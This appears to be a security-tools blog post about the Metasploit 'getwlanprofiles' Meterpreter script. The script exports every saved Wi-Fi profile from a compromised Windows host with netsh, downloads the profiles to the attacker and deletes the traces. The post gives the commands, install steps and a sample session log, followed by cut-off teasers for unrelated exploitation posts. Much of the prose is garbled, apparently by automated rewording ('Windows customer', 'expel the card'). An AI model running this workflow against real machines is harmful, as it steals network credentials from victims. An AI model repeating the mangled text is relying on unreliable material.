Metasploit getwlanprofiles is a Meterpreter script which when kept running against Windows 7 or Vista boxes will extract and download all the wireless profiles that are setup with the Windows customer, i.e. not with outsider customer applications.
It does this by using the following command to dump all the profiles to the current %TEMP% directory
netsh wlan export profile folder=%TEMP%At that point for each line of the output finding the filename of the profile and downloading it. To clean up the record is then erased from the index.
The profiles are stored in the .msf3/logs/scripts/wlan_profiles/ directory.
To re-use the profiles they can be imported into another Windows box by using the following command
netsh wlan add profile filename="the_filename.xml"Something that was found while testing this is whether you have an outer wifi card and setup the profiles at that point expel the card the profiles are never again accessible to the netsh script. When the card is reinserted the profiles return. There will in any case be an approach to get to them however Metasploit getwlanprofiles doesn’t do it.
Simply uncompress the script and move it to the meterpreter/scripts directory. Also probably best remove the version number from the filename while doing so.
When you run Metasploit getwlanprofiles should look like this:
meterpreter > run getwlanprofiles
[*] Running Windows Wlan Profile Downloader Meterpreter Script
[*] New session on 192.168.0.80:53831...
[*] Running export command - netsh wlan export profile folder=C:\Users\robin\AppData\Local\Temp
[*] Downloading profile wpa_profile to /home/robin/.msf3/logs/scripts/wlan_profiles/VISTA-DOMAIN_20110110.5030/wpa_profile.xml
[*] Deleting file C:\Users\robin\AppData\Local\Temp\Wireless Network Connection 2-wpa.xml
[*] Downloading profile thisiswep to /home/robin/.msf3/logs/scripts/wlan_profiles/VISTA-DOMAIN_20110110.5030/thisiswep.xml
[*] Deleting file C:\Users\robin\AppData\Local\Temp\Wireless Network Connection 2-thisiswep.xml
[*] Downloading profile eap to /home/robin/.msf3/logs/scripts/wlan_profiles/VISTA-DOMAIN_20110110.5030/eap.xml
[*] Deleting file C:\Users\robin\AppData\Local\Temp\Wireless Network Connection 2-this is it.xml
[*] Found and extracted 3 profiles
[*] Done!Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…
MODeflattener is a specialized tool designed to reverse OLLVM's control flow flattening obfuscation through static…
"My Awesome List" is a curated collection of tools, libraries, and resources spanning various domains…
CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, allowed attackers to execute arbitrary…
The blog post "Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals" provides…
The exploitation of CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, relies on…